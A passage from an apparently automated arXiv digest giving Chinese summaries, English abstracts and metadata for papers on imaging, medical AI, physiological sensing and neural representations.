pelvic synthetic CT generation from MRI and warrant further investigation for downstream applications such as MRI-only radiotherapy planning and PET/MR attenuation correction.
[CV-305] Segmenting Superbubbles in a Simulated Multiphase Interstellar Medium using Computer Vision
【速读】:该论文旨在解决如何在磁流体动力学(MHD)模拟的超新星驱动星际介质中,实现对超气泡(superbubble)的精确三维分割与追踪问题。其解决方案的关键在于开发了一种基于计算机视觉的方法,利用先进的3D Transformer模型有效捕捉这些天体物理结构的复杂形态及其动态演化过程,从而生成高精度的三维分割掩膜,实现对超气泡结构演变、能量保留及与周围星际物质相互作用的定量分析。
链接: https://arxiv.org/abs/2603.27741
作者: Jing-Wen Chen,Alex S. Hill,Anna Ordog,Rebecca A. Booth,Mohamed S. Shehata
机构: University of British Columbia, Okanagan Campus (不列颠哥伦比亚大学奥肯那根校区); Dominion Radio Astrophysical Observatory, Herzberg Research Centre for Astronomy and Astrophysics, National Research Council Canada (国家研究委员会赫尔兹伯格天文与天体物理研究中心); University of Western Ontario (西门菲莎大学); University of Calgary (卡尔加里大学)
类目: Astrophysics of Galaxies (astro-ph.GA); Computer Vision and Pattern Recognition (cs.CV)
备注:
Abstract:We developed a computer vision-based methodology to achieve precise 3D segmentation and tracking of superbubbles within magnetohydrodynamic simulations of the supernova-driven interstellar medium. Leveraging advanced 3D transformer models, our approach effectively captures the complex morphology and dynamic evolution of these astrophysical structures. To demonstrate the technique, we specifically focused on a superbubble exhibiting interesting interactions with its surrounding medium, driven by a series of successive supernova explosions. Our model successfully generated detailed 3D segmentation masks, enabling us to visualize and analyze the bubble’s structural evolution over time. The results reveal insights into the superbubble’s growth patterns, energy retention, and interactions with surrounding interstellar matter. This interdisciplinary approach not only enhances our understanding of superbubble dynamics but also offers a robust framework for investigating other complex phenomena in the cosmos.
[CV-306] Grounding Social Perception in Intuitive Physics
【速读】:该论文旨在解决人类如何在物理世界约束下,通过观察他人行为推断其社会意图(如目标、关系等)的问题,即“物理 grounded 社会感知”机制。传统方法多依赖视觉模式匹配,难以捕捉动作背后的因果逻辑与心理状态变化。解决方案的关键在于提出一个融合直觉心理学(intuitive psychology)与直觉物理学(intuitive physics)的计算模型——SIMPLE,该模型基于贝叶斯逆向规划框架,整合了物理模拟、规划推理与概率推理能力,能够从代理轨迹中准确推断其目标和关系。实验表明,SIMPLE在PHASE数据集上表现接近人类判断,而纯视觉或忽略物理约束的基线模型则显著落后,验证了物理基础推理对社会理解的核心作用。
链接: https://arxiv.org/abs/2603.27410
作者: Lance Ying,Aydan Y. Huang,Aviv Netanyahu,Andrei Barbu,Boris Katz,Joshua B. Tenenbaum,Tianmin Shu
机构: Massachusetts Institute of Technology (麻省理工学院); Harvard University (哈佛大学); Johns Hopkins University (约翰霍普金斯大学); Amazon (亚马逊)
类目: Neurons and Cognition (q-bio.NC); Artificial Intelligence (cs.AI); Computer Vision and Pattern Recognition (cs.CV)
备注: 26 pages, 11 figures
Abstract:People infer rich social information from others’ actions. These inferences are often constrained by the physical world: what agents can do, what obstacles permit, and how the physical actions of agents causally change an environment and other agents’ mental states and behavior. We propose that such rich social perception is more than visual pattern matching, but rather a reasoning process grounded in an integration of intuitive psychology with intuitive physics. To test this hypothesis, we introduced PHASE (PHysically grounded Abstract Social Events), a large dataset of procedurally generated animations, depicting physically simulated two-agent interactions on a 2D surface. Each animation follows the style of the Heider and Simmel movie, with systematic variation in environment geometry, object dynamics, agent capacities, goals, and relationships (friendly/adversarial/neutral). We then present a computational model, SIMPLE, a physics-grounded Bayesian inverse planning model that integrates planning, probabilistic planning, and physics simulation to infer agents’ goals and relations from their trajectories. Our experimental results showed that SIMPLE achieved high accuracy and agreement with human judgments across diverse scenarios, while feedforward baseline models – including strong vision-language models – and physics-agnostic inverse planning failed to achieve human-level performance and did not align with human judgments. These results suggest that our model provides a computational account for how people understand physically grounded social scenes by inverting a generative model of physics and agents.
[CV-307] Guided Lensless Polarization Imaging
【速读】:该论文旨在解决传统偏振成像系统成本高、体积大以及现有无透镜偏振成像系统重建质量有限的问题。其关键解决方案是提出一种RGB引导的无透镜偏振成像系统,通过融合一个紧凑的偏振-RGB传感器与一个辅助的常规RGB相机提供的结构引导信息,采用两阶段重建流程:第一阶段基于物理模型反演获得初始偏振图像,第二阶段利用Transformer架构的融合网络结合RGB引导图像对结果进行精细化重构,从而显著提升重建质量和保真度,并在不同数据集和成像条件下具有良好泛化能力,且无需微调即可实现实验原型机的高质量真实成像。
链接: https://arxiv.org/abs/2603.27357
作者: Noa Kraicer,Erez Yosef,Raja Giryes
机构: Tel Aviv University (特拉维夫大学)
类目: Image and Video Processing (eess.IV); Artificial Intelligence (cs.AI); Computer Vision and Pattern Recognition (cs.CV)
备注:
Abstract:Polarization imaging captures the polarization state of light, revealing information invisible to the human eye yet valuable in domains such as biomedical diagnostics, autonomous driving, and remote sensing. However, conventional polarization cameras are often expensive, bulky, or both, limiting their practical use. Lensless imaging offers a compact, low-cost alternative by replacing the lens with a simple optical element like a diffuser and performing computational reconstruction, but existing lensless polarization systems suffer from limited reconstruction quality. To overcome these limitations, we introduce a RGB-guided lensless polarization imaging system that combines a compact polarization-RGB sensor with an auxiliary, widely available conventional RGB camera providing structural guidance. We reconstruct multi-angle polarization images for each RGB color channel through a two-stage pipeline: a physics-based inversion recovers an initial polarization image, followed by a Transformer-based fusion network that refines this reconstruction using the RGB guidance image from the conventional RGB camera. Our two-stage method significantly improves reconstruction quality and fidelity over lensless-only baselines, generalizes across datasets and imaging conditions, and achieves high-quality real-world results on our physical prototype lensless camera without any fine-tuning.
[CV-308] Quantitative measurements of biological/chemical concentrations using smartphone cameras
【速读】:该论文旨在解决传统生物/化学检测设备体积大、成本高且不便于在偏远或资源匮乏地区使用的问题。其核心解决方案是构建一个基于智能手机的成像系统,通过设计特定的光学装置结合图像处理与数据分析技术,建立颜色信息与样品浓度之间的定量关系数据库。该方法能够实现对荧光物质和胶体混合物浓度的精确估计,性能可媲美商用及实验室仪器,为开发小型化、低成本、便携式的分析与诊断系统提供了可行路径。
链接: https://arxiv.org/abs/2603.27118
作者: Zhendong Cao,Hongji Dai,Zhida Li,Ash Parameswaran
机构: 未知
类目: Image and Video Processing (eess.IV); Computer Vision and Pattern Recognition (cs.CV)
备注:
Abstract:This paper presents a smartphone-based imaging system capable of quantifying the concentration of an assortment of biological/chemical assay samples. The main objective is to construct an image database which characterizes the relationship between color information and concentrations of the biological/chemical assay sample. For this aim, a designated optical setup combined with image processing and data analyzing techniques was implemented. A series of experiments conducted on selected assays, including fluorescein, RNA Mango, homogenized milk and yeast have demonstrated that the proposed system estimates the concentration of fluorescent materials and colloidal mixtures comparable to currently used commercial and laboratory instruments. Furthermore, by utilizing the camera and computational power of smartphones, eventual development can be directed toward extremely compact, inexpensive and portable analysis and diagnostic systems which will allow experiments and tests to be conducted in remote or impoverished areas.
[CV-309] Uncertainty-Aware Mapping from 3D Keypoints to Anatomical Landmarks for Markerless Biomechanics
【速读】:该论文旨在解决标记式生物力学分析中,基于视频提取的3D骨骼关键点(3D skeletal keypoints)在映射到3D解剖学地标(3D anatomical landmarks)时缺乏帧级质量控制的问题。传统方法将关键点估计视为确定性输出,无法量化其不确定性,从而影响后续逆运动学和肌肉骨骼分析的可靠性。解决方案的关键在于引入一种基于时间学习框架的不确定性感知建模方法,区分观测噪声引起的不确定性与模型局限性带来的不确定性,并利用AMASS数据集上的同步动作捕捉真值评估其有效性。实验表明,模型不确定性估计与地标误差呈现显著单调相关性(Spearman ρ ≈ 0.63),可实现高精度的帧级可靠性排序(如10%覆盖率下误差降低至≈16.8 mm)及严重异常检测(ROC-AUC ≈ 0.92,阈值为50 mm),且对输入退化具有鲁棒性,验证了预测不确定性作为自动质量控制工具的实际可行性。
链接: https://arxiv.org/abs/2603.26844
作者: Cesare Davide Pace,Alessandro Marco De Nunzio,Claudio De Stefano,Francesco Fontanella,Mario Molinara
机构: Università degli Studi di Cassino e del Lazio Meridionale (卡西诺和拉齐奥南部大学)
类目: Image and Video Processing (eess.IV); Artificial Intelligence (cs.AI); Computer Vision and Pattern Recognition (cs.CV)
备注: 7 pages, 1 figure, submitted to Patter Recognition Letters, uncertainty-aware framework for 3D keypoint-to-landmark mapping in markerless biomechanics
Abstract:Markerless biomechanics increasingly relies on 3D skeletal keypoints extracted from video, yet downstream biomechanical mappings typically treat these estimates as deterministic, providing no principled mechanism for frame-wise quality control. In this work, we investigate predictive uncertainty as a quantitative measure of confidence for mapping 3D pose keypoints to 3D anatomical landmarks, a critical step preceding inverse kinematics and musculoskeletal analysis. Within a temporal learning framework, we model both uncertainty arising from observation noise and uncertainty related to model limitations. Using synchronized motion capture ground truth on AMASS, we evaluate uncertainty at frame and joint level through error–uncertainty rank correlation, risk–coverage analysis, and catastrophic outlier detection. Across experiments, uncertainty estimates, particularly those associated with model uncertainty, exhibit a strong monotonic association with landmark error (Spearman \rho \approx 0.63 ), enabling selective retention of reliable frames (error reduced to \approx 16.8 mm at 10% coverage) and accurate detection of severe failures (ROC-AUC \approx 0.92 for errors 50 mm). Reliability ranking remains stable under controlled input degradation, including Gaussian noise and simulated missing joints. In contrast, uncertainty attributable to observation noise provides limited additional benefit in this setting, suggesting that dominant failures in keypoint-to-landmark mapping are driven primarily by model uncertainty. Our results establish predictive uncertainty as a practical, frame-wise tool for automatic quality control in markerless biomechanical pipelines. Comments: 7 pages, 1 figure, submitted to Patter Recognition Letters, uncertainty-aware framework for 3D keypoint-to-landmark mapping in markerless biomechanics Subjects: Image and Video Processing (eess.IV); Artificial Intelligence (cs.AI); Computer Vision and Pattern Recognition (cs.CV) ACMclasses: I.2.10; I.4.8 Cite as: arXiv:2603.26844 [eess.IV] (or arXiv:2603.26844v1 [eess.IV] for this version) https://doi.org/10.48550/arXiv.2603.26844 Focus to learn more arXiv-issued DOI via DataCite (pending registration) Submission history From: Cesare Davide Pace [view email] [v1] Fri, 27 Mar 2026 09:42:23 UTC (33 KB)
[CV-310] Reliability-Aware Weighted Multi-Scale Spatio-Temporal Maps for Heart Rate Monitoring ICIP2026
【速读】:该论文旨在解决远程光电容积脉搏波描记术(remote photoplethysmography, rPPG)在非受控环境下因光照变化、运动、阴影和镜面反射等因素导致信号质量下降的问题。其解决方案的关键在于提出一种可靠性感知加权多尺度时空(Reliability-Aware Weighted Multi-Scale Spatio-Temporal, WMST)映射机制,通过抑制环境噪声来建模像素可靠性,并采用不同的加权策略聚焦于更具生理有效性的区域;同时结合基于Swin-Unet的自监督对比学习框架,利用传统rPPG信号与时间扩展的WMST映射生成正样本对,并引入高-高-高(High-High-High, HHH)小波映射作为负样本以保留运动和结构信息但滤除生理成分,从而显著提升心率(heart rate, HR)估计的鲁棒性和准确性。
链接: https://arxiv.org/abs/2603.26836
作者: Arpan Bairagi,Rakesh Dey,Siladittya Manna,Umapada Pal
机构: 未知
类目: Image and Video Processing (eess.IV); Computer Vision and Pattern Recognition (cs.CV)
备注: 6 pages, 4 figures. Under review at ICIP 2026
Abstract:Remote photoplethysmography (rPPG) allows for the contactless estimation of physiological signals from facial videos by analyzing subtle skin color changes. However, rPPG signals are extremely susceptible to illumination changes, motion, shadows, and specular reflections, resulting in low-quality signals in unconstrained environments. To overcome these issues, we present a Reliability-Aware Weighted Multi-Scale Spatio-Temporal (WMST) map that models pixel reliability through the suppression of environmental noises. These noises are modeled using different weighting strategies to focus on more physiologically valid areas. Leveraging the WMST map, we develop an SSL contrastive learning approach based on Swin-Unet, where positive pairs are generated from conventional rPPG signals and temporally expanded WMST maps. Moreover, we introduce a new High-High-High (HHH) wavelet map as a negative example that maintains motion and structural details while filtering out physiological information. Here, our aim is to estimate heart rate (HR), and the experiments on public rPPG benchmarks show that our approach enhances motion and illumination robustness with lower HR estimation error and higher Pearson correlation than existing Self-Supervised Learning (SSL) based rPPG methods.
[CV-311] ANVIL: Accelerator-Native Video Interpolation via Codec Motion Vector Priors
【速读】:该论文旨在解决生成式 AI (Generative AI) 在移动端实现视频帧率翻倍(frame-rate doubling)时面临的三大部署障碍:一是空间采样操作超出帧预算或缺乏硬件支持;二是迭代光流精修在8位后训练量化(post-training quantization)下失效;三是内存密集型操作主导推理图。解决方案的关键在于利用H.264解码器已计算出的运动向量(motion vectors)对输入帧进行预对齐,从而移除模型中学习的光流、空间采样和迭代累积模块,使剩余结构仅由以卷积为主的计算密集型操作构成,显著提升移动端神经处理单元(NPU)上的推理效率与量化鲁棒性。
链接: https://arxiv.org/abs/2603.26835
作者: Shibo Liu
机构: North China University of Science and Technology (华北理工大学)
类目: Image and Video Processing (eess.IV); Computer Vision and Pattern Recognition (cs.CV)
备注: 12 pages, 4 figures, 9 tables
Abstract:Mobile displays refresh at 90-120 Hz, yet most video is encoded at 24-30 frames per second; real-time frame-rate doubling requires each synthesized frame within 33.3 ms on mobile neural processing units. We show that mainstream flow-based video frame interpolation faces three structural deployment barriers on mobile accelerators: spatial sampling operators exceed the frame budget or lack hardware support, iterative flow refinement collapses under 8-bit post-training quantization, and memory-bound operators dominate the inference graph. ANVIL addresses these barriers by reusing motion vectors already computed by the H.264 decoder to prealign input frames, removing learned optical flow, spatial sampling, and iterative accumulation from the accelerator graph. The remaining residual is refined by a convolution-dominated network whose inference graph is composed almost entirely of compute-bound operators. On a Snapdragon 8 Gen 3 device, ANVIL achieves 12.8 ms 1080p network inference in 8-bit integer precision; an open-source Android player sustains 28.4 ms median end-to-end latency per interpolated frame pair over 54,623 consecutively logged samples during 30-minute continuous playback. Per-operator causal analysis identifies quantized accumulation on recurrent flow states as a key mechanism behind integer quantization failure in iterative methods. The current design targets H.264 playback scenarios with decoder-exposed motion vectors.
[CV-312] Hybrid Diffusion Model for Breast Ultrasound Image Augmentation
【速读】:该论文旨在解决乳腺超声(Breast Ultrasound, BUS)数据集在数据增强过程中存在的图像质量低、纹理失真等问题,这些问题限制了下游诊断模型的鲁棒性。其解决方案的关键在于提出了一种混合扩散增强框架,通过结合文本到图像生成(text-to-image generation)与图像到图像(image-to-image, img2img)精炼机制,并引入低秩适应(Low-Rank Adaptation, LoRA)和文本反转(Textual Inversion, TI)进行微调,从而显著提升合成图像的视觉保真度和纹理一致性。实验表明,相较于Stable Diffusion v1.5基线,该方法将Frechet Inception Distance (FID) 从45.97降至33.29,同时保持了与原始模型相当的分类性能,有效克服了传统扩散增强方法在超声图像中常见的低质量缺陷。
链接: https://arxiv.org/abs/2603.26834
作者: Farhan Fuad Abir,Sanjeda Sara Jennifer,Niloofar Yousefi,Laura J. Brattain
机构: 未知
类目: Image and Video Processing (eess.IV); Artificial Intelligence (cs.AI); Computer Vision and Pattern Recognition (cs.CV)
备注: Accepted at IEEE International Symposium on Biomedical Imaging (ISBI) 2026
Abstract:We propose a hybrid diffusion-based augmentation framework to overcome the critical challenge of ultrasound data augmentation in breast ultrasound (BUS) datasets. Unlike conventional diffusion-based augmentations, our approach improves visual fidelity and preserves ultrasound texture by combining text-to-image generation with image-to-image (img2img) refinement, as well as fine-tuning with low-rank adaptation (LoRA) and textual inversion (TI). Our method generated realistic, class-consistent images on an open-source Kaggle breast ultrasound image dataset (BUSI). Compared to the Stable Diffusion v1.5 baseline, incorporating TI and img2img refinement reduced the Frechet Inception Distance (FID) from 45.97 to 33.29, demonstrating a substantial gain in fidelity while maintaining comparable downstream classification performance. Overall, the proposed framework effectively mitigates the low-fidelity limitations of synthetic ultrasound images and enhances the quality of augmentation for robust diagnostic modeling.
[CV-313] External Benchmarking of Lung Ultrasound Models for Pneumothorax-Related Signs: A Manifest-Based Multi-Source Study
【速读】:该论文旨在解决肺气胸相关肺部超声(LUS)人工智能(AI)模型外部验证缺乏可重复基准的问题,以及二分类的肺滑动判断可能掩盖临床重要征象的局限性。其解决方案的关键在于构建了一个基于“重构说明文件”(manifest-based)的多源外部基准,该基准包含视频URL、时间戳、裁剪坐标、标签及探头形状等信息,从而实现无需重新分发原始视频即可进行可复现的外部评估;同时引入四种标签(正常肺滑动、无肺滑动、肺点、肺脉)替代单一的二分类任务,揭示了传统二分类模型对“肺脉”和“肺点”等模糊状态的误判问题,证明了多类别细粒度标注对于提升AI在 pneumothorax 诊断中推理能力的重要性。
链接: https://arxiv.org/abs/2603.26832
作者: Takehiro Ishikawa
机构: 未知
类目: Image and Video Processing (eess.IV); Computer Vision and Pattern Recognition (cs.CV)
备注:
Abstract:Background and Aims: Reproducible external benchmarks for pneumothorax-related lung ultrasound (LUS) AI are scarce, and binary lung-sliding classification may obscure clinically important signs. We therefore developed a manifest-based external benchmark and used it to test both cross-domain generalization and task validity. Methods: We curated 280 clips from 190 publicly accessible LUS source videos and released a reconstruction manifest containing URLs, timestamps, crop coordinates, labels, and probe shape. Labels were normal lung sliding, absent lung sliding, lung point, and lung pulse. A previously published single-site binary classifier was evaluated on this benchmark; challenge-state analysis examined lung point and lung pulse using the predicted probability of absent sliding, P(absent). Results: The single-site comparator achieved ROC-AUC 0.9625 in-domain but 0.7050 on the heterogeneous external benchmark; restricting external evaluation to linear clips still yielded ROC-AUC 0.7212. In challenge-state analysis, mean P(absent) ranked absent (0.504) lung point (0.313) normal (0.186) lung pulse (0.143). Lung pulse differed from absent clips (p=0.000470) but not from normal clips (p=0.813), indicating that the binary model treated pulse as normal-like despite absent sliding. Lung point differed from both absent (p=0.000468) and normal (p=0.000026), supporting its interpretation as an intermediate ambiguity state rather than a clean binary class. Conclusion: A manifest-based, multi-source benchmark can support reproducible external evaluation without redistributing source videos. Binary lung-sliding classification is an incomplete proxy for pneumothorax reasoning because it obscures blind-spot and ambiguity states such as lung pulse and lung point.
[CV-314] oward Actionable Digital Twins for Radiation-Based Imaging and Therapy: Mathematical Formulation Modular Workflow and an OpenKBP-Based Dose-Surrogate Prototype
【速读】:该论文旨在解决辐射成像与治疗中数字孪生(Digital Twin)系统在临床应用中的可操作性问题,即如何通过整合患者数据、量化预测不确定性并支持受临床约束的决策来提升数字孪生的实用性。其解决方案的关键在于提出一个模块化框架,包含PatientData、Model、Solver、Calibration和Decision五大模块,并形式化了潜在状态更新、不确定性传播及机会约束下的动作选择机制;同时基于\openkbp基准构建了一个可复现的开放数据组件,采用GPU就绪的PyTorch/MONAI实现11通道3D U-Net模型(19.2M参数),结合掩码损失训练与蒙特卡洛Dropout进行体素级认知不确定性估计,实现了包含重新校准、蒙特卡洛推理和空间优化的三分数闭环流程,平均耗时仅10.3秒,且在100名患者的测试集中达到均方剂量误差2.65 Gy和DVH得分1.82 Gy,验证了该框架在剂量预测、不确定性传播及代理闭环适应方面的有效性。
链接: https://arxiv.org/abs/2603.26820
作者: Hsin-Hsiung Huang,Bulent Soykan
机构: University of Central Florida (中佛罗里达大学)
类目: Image and Video Processing (eess.IV); Computer Vision and Pattern Recognition (cs.CV); Applications (stat.AP); Computation (stat.CO)
备注:
Abstract:Digital twins for radiation-based imaging and therapy are most useful when they assimilate patient data, quantify predictive uncertainty, and support clinically constrained decisions. This paper presents a modular framework for actionable digital twins in radiation-based imaging and therapy and instantiates its reproducible open-data component using the \openkbpfull benchmark. The framework couples PatientData, Model, Solver, Calibration, and Decision modules and formalizes latent-state updating, uncertainty propagation, and chance-constrained action selection. As an initial implementation, we build a GPU-ready PyTorch/MONAI reimplementation of the \openkbp starter pipeline: an 11-channel, 19.2M-parameter 3D U-Net trained with a masked loss over the feasible region and equipped with Monte Carlo dropout for voxel-wise epistemic uncertainty. To emulate the update loop on a static benchmark, we introduce decoder-only proxy recalibration and illustrate uncertainty-aware virtual-therapy evaluation using DVH-based and biological utilities. A complete three-fraction loop including recalibration, Monte Carlo inference, and spatial optimization executes in 10.3~s. On the 100-patient test set, the model achieved mean dose and DVH scores of 2.65 and 1.82~Gy, respectively, with 0.58~s mean inference time per patient. The \openkbp case study thus serves as a reproducible test bed for dose prediction, uncertainty propagation, and proxy closed-loop adaptation, while future institutional studies will address longitudinal calibration with delivered-dose logs and repeat imaging.
[CV-315] Dictionary-based Pathology Mining with Hard-instance-assisted Classifier Debiasing for Genetic Biomarker Prediction from WSIs
【速读】:该论文旨在解决病理图像中遗传生物标志物(如结直肠癌中的微卫星不稳定性,Microsatellite Instability, MSI)预测的两个关键挑战:一是难以构建包含复杂病理组分间交互关系的病理感知表征;二是全切片图像(Whole Slide Images, WSI)中存在大量与生物标志物无关的区域,导致模型易过拟合无关实例。解决方案的核心在于提出一种基于字典的分层病理挖掘与硬实例辅助分类器去偏框架(Dictionary-based hierarchical pathology mining with hard-instance-assisted classifier debiasing, D2Bio)。其关键创新包括:第一,通过字典驱动的分层病理挖掘模块,无需限制patch间距即可捕获多样且细粒度的病理上下文交互;第二,引入硬实例辅助的分类器去偏模块,在无额外标注的情况下聚焦于难样本但任务相关的特征,从而学习到更鲁棒、去偏的分类器。实验表明,该方法在多个队列上显著优于现有方法,尤其在TCGA-CRC-MSI队列中AUROC提升超过4%,并展现出良好的临床可解释性与生存分析潜力。
链接: https://arxiv.org/abs/2603.26809
作者: Ling Zhang,Boxiang Yun,Ting Jin,Qingli Li,Xinxing Li,Yan Wang
机构: Shanghai Key Laboratory of Multidimensional Information Processing, East China Normal University, Shanghai, China (上海多维信息处理重点实验室,华东师范大学,中国上海); Department of General Surgery, Tongji Hospital, Tongji University School of Medicine, Shanghai 200065, China (同济医院普外科,同济大学医学院,中国上海)
类目: Quantitative Methods (q-bio.QM); Computer Vision and Pattern Recognition (cs.CV); Machine Learning (cs.LG)
备注: 13 pages, 13 figures
Abstract:Prediction of genetic biomarkers, e.g., microsatellite instability in colorectal cancer is crucial for clinical decision making. But, two primary challenges hamper accurate prediction: (1) It is difficult to construct a pathology-aware representation involving the complex interconnections among pathological components. (2) WSIs contain a large proportion of areas unrelated to genetic biomarkers, which make the model easily overfit simple but irrelative instances. We hereby propose a Dictionary-based hierarchical pathology mining with hard-instance-assisted classifier Debiasing framework to address these challenges, dubbed as D2Bio. Our first module, dictionary-based hierarchical pathology mining, is able to mine diverse and very fine-grained pathological contextual interaction without the limit to the distances between patches. The second module, hard-instance-assisted classfier debiasing, learns a debiased classifier via focusing on hard but task-related features, without any additional annotations. Experimental results on five cohorts show the superiority of our method, with over 4% improvement in AUROC compared with the second best on the TCGA-CRC-MSI cohort. Our analysis further shows the clinical interpretability of D2Bio in genetic biomarker diagnosis and potential clinical utility in survival analysis. Code will be available at this https URL.
[CV-316] Beyond Benchmarks: A Framework for Post Deployment Validation of CT Lung Nodule Detection AI
【速读】:该论文旨在解决生成式 AI (Generative AI) 辅助肺结节检测模型在临床部署后,因CT扫描参数(如剂量和层厚)系统性变化导致性能不可预测的问题。解决方案的关键在于提出并验证了一个基于物理机制的评估框架,通过模拟不同剂量减少(25%、50%)和层厚变化(3 mm、5 mm)条件下的图像特征,定量分析模型敏感性;结果表明,层厚变化对检测性能的影响远大于噪声干扰,尤其5 mm层厚导致灵敏度下降达42%,凸显其作为关键约束因素的重要性。该框架无需专有设备数据,具备可复现性,适用于资源受限环境中的持续后部署质量保证(QA)。
链接: https://arxiv.org/abs/2603.26785
作者: Daniel Soliman
机构: 未知
类目: Image and Video Processing (eess.IV); Computer Vision and Pattern Recognition (cs.CV)
备注:
Abstract:Background: Artificial intelligence (AI) assisted lung nodule detection systems are increasingly deployed in clinical settings without site-specific validation. Performance reported under benchmark conditions may not reflect real-world behavior when acquisition parameters differ from training data. Purpose: To propose and demonstrate a physics-guided framework for evaluating the sensitivity of a deployed lung nodule detection model to systematic variation in CT acquisition parameters. Methods: Twenty-one cases from the publicly available LIDC-IDRI dataset were evaluated using a MONAI RetinaNet model pretrained on LUNA16 (fold 0, no fine-tuning). Five imaging conditions were tested: baseline, 25% dose reduction, 50% dose reduction, 3 mm slice thickness, and 5 mm slice thickness. Dose reduction was simulated via image-domain Gaussian noise; slice thickness via moving average along the z-axis. Detection sensitivity was computed at a confidence threshold of 0.5 with a 15 mm matching criterion. Results: Baseline sensitivity was 45.2% (57/126 consensus nodules). Dose reduction produced slight degradation: 41.3% at 25% dose and 42.1% at 50% dose. The 5 mm slice thickness condition produced a marked drop to 26.2% - a 19 percentage point reduction representing a 42% relative decrease from baseline. This finding was consistent across confidence thresholds from 0.1 to 0.9. Per-case analysis revealed heterogeneous performance including two cases with complete detection failure at baseline. Conclusion: Slice thickness represents a more fundamental constraint on AI detection performance than image noise under the conditions tested. The proposed framework is reproducible, requires no proprietary scanner data, and is designed to serve as the basis for ongoing post-deployment QA in resource-constrained environment.
[CV-317] Stress Classification from ECG Signals Using Vision Transformer
【速读】:该论文旨在解决基于生理信号(如心电图 ECG)进行多层级压力评估的问题,尤其针对跨被试差异(intersubject variability)带来的挑战。传统卷积神经网络(CNN)模型在处理此类数据时受限于手工特征设计及对个体差异的敏感性,难以实现高鲁棒性和泛化能力。解决方案的关键在于将原始 ECG 信号通过短时傅里叶变换(STFT)转换为二维频谱图(2D spectrograms),并将其以图像块(patches)形式输入视觉 Transformer(Vision Transformer)编码器,利用其自注意力机制捕捉全局依赖关系,从而有效建模跨被试间的变异特性。实验表明,该方法无需人工特征工程、端到端训练,且在 WESAD 和 RML 数据集上分别实现了 76.7% 和 71.01% 的三分类准确率以及 88.3% 的二分类准确率,显著优于现有最先进方法。
链接: https://arxiv.org/abs/2603.26721
作者: Zeeshan Ahmad,Naimul Khan
机构: 未知
类目: ignal Processing (eess.SP); Artificial Intelligence (cs.AI); Computer Vision and Pattern Recognition (cs.CV); Machine Learning (cs.LG)
备注: 10 pages
Abstract:Vision Transformers have shown tremendous success in numerous computer vision applications; however, they have not been exploited for stress assessment using physiological signals such as Electrocardiogram (ECG). In order to get the maximum benefit from the vision transformer for multilevel stress assessment, in this paper, we transform the raw ECG data into 2D spectrograms using short time Fourier transform (STFT). These spectrograms are divided into patches for feeding to the transformer encoder. We also perform experiments with 1D CNN and ResNet-18 (CNN model). We perform leave-onesubject-out cross validation (LOSOCV) experiments on WESAD and Ryerson Multimedia Lab (RML) dataset. One of the biggest challenges of LOSOCV based experiments is to tackle the problem of intersubject variability. In this research, we address the issue of intersubject variability and show our success using 2D spectrograms and the attention mechanism of transformer. Experiments show that vision transformer handles the effect of intersubject variability much better than CNN-based models and beats all previous state-of-the-art methods by a considerable margin. Moreover, our method is end-to-end, does not require handcrafted features, and can learn robust representations. The proposed method achieved 71.01% and 76.7% accuracies with RML dataset and WESAD dataset respectively for three class classification and 88.3% for binary classification on WESAD.
[CV-318] EMPD: An Event-based Multimodal Physiological Dataset for Remote Pulse Wave Detection
【速读】:该论文旨在解决传统基于帧式相机的远程光电容积脉搏波描记术(remote photoplethysmography, rPPG)在运动伪影和有限时间分辨率方面的局限性。其解决方案的关键在于构建首个专为事件相机(event camera)设计的多模态生理数据集EMP D(Event-based Multimodal Physiological Dataset),通过激光辅助采集系统将桡动脉皮肤微振动调制为可被类脑传感器检测的显著信号,结合高分辨率事件相机、工业级RGB相机与临床级血氧仪,实现微秒级时间精度的多模态同步数据采集,从而为类脑生理监测算法的鲁棒性开发提供关键基准资源。
链接: https://arxiv.org/abs/2603.26699
作者: Qian Feng,Pengfei Li,Rongshan Gao,Jiale Xu,Rui Gong,Yidi Li
机构: Taiyuan University of Technology (太原理工大学)
类目: ignal Processing (eess.SP); Computer Vision and Pattern Recognition (cs.CV); Machine Learning (cs.LG)
备注: 12 pages, 4 figures, 2 tables
Abstract:Remote photoplethysmography (rPPG) based on traditional frame-based cameras often struggles with motion artifacts and limited temporal resolution. To address these limitations, we introduce EMPD (Event-based Multimodal Physiological Dataset), the first benchmark dataset specifically designed for non-contact physiological sensing via event cameras. The dataset leverages a laser-assisted acquisition system where a high-coherence laser modulates subtle skin vibrations from the radial artery into significant signals detectable by a neuromorphic sensor. The hardware platform integrates a high-resolution event camera to capture micro-motions and intensity transients, an industrial RGB camera to provide traditional rPPG benchmarks, and a clinical-grade pulse oximeter to record ground truth PPG waveforms. EMPD contains 193 valid records collected from 83 subjects, covering a wide heart rate range (40-110 BPM) under both resting and post-exercise conditions. By providing precisely synchronized multimodal data with microsecond-level temporal precision, EMPD serves as a crucial resource for developing robust algorithms in the field of neuromorphic physiological monitoring. The dataset is publicly available at: this https URL
人工智能
[AI-0] Geometry-aware similarity metrics for neural representations on Riemannian and statistical manifolds
【速读】:该论文旨在解决现有相似性度量方法在分析神经网络表征几何结构时的局限性问题,即传统方法仅比较状态空间中的外蕴几何(extrinsic geometry),难以捕捉不同神经网络解决方案之间的细微但关键差异。其解决方案的关键在于提出一种基于黎曼几何(Riemannian geometry)的新方法——度量相似性分析(Metric Similarity Analysis, MSA),该方法在流形假设(manifold hypothesis)下比较神经表征的内蕴几何(intrinsic geometry),从而更准确地揭示深度网络中不同学习机制、非线性动力学以及扩散模型等场景下的计算特征。
链接: https://arxiv.org/abs/2603.28764
作者: N Alex Cayco Gajic,Arthur Pellegrino
机构: 未知
类目: Machine Learning (cs.LG); Artificial Intelligence (cs.AI); Differential Geometry (math.DG); Neurons and Cognition (q-bio.NC)
备注:
Abstract:Similarity measures are widely used to interpret the representational geometries used by neural networks to solve tasks. Yet, because existing methods compare the extrinsic geometry of representations in state space, rather than their intrinsic geometry, they may fail to capture subtle yet crucial distinctions between fundamentally different neural network solutions. Here, we introduce metric similarity analysis (MSA), a novel method which leverages tools from Riemannian geometry to compare the intrinsic geometry of neural representations under the manifold hypothesis. We show that MSA can be used to i) disentangle features of neural computations in deep networks with different learning regimes, ii) compare nonlinear dynamics, and iii) investigate diffusion models. Hence, we introduce a mathematically grounded and broadly applicable framework to understand the mechanisms behind neural computations by comparing their intrinsic geometries.
[AI-1] RAD-AI: Rethinking Architecture Documentation for AI-Augmented Ecosystems
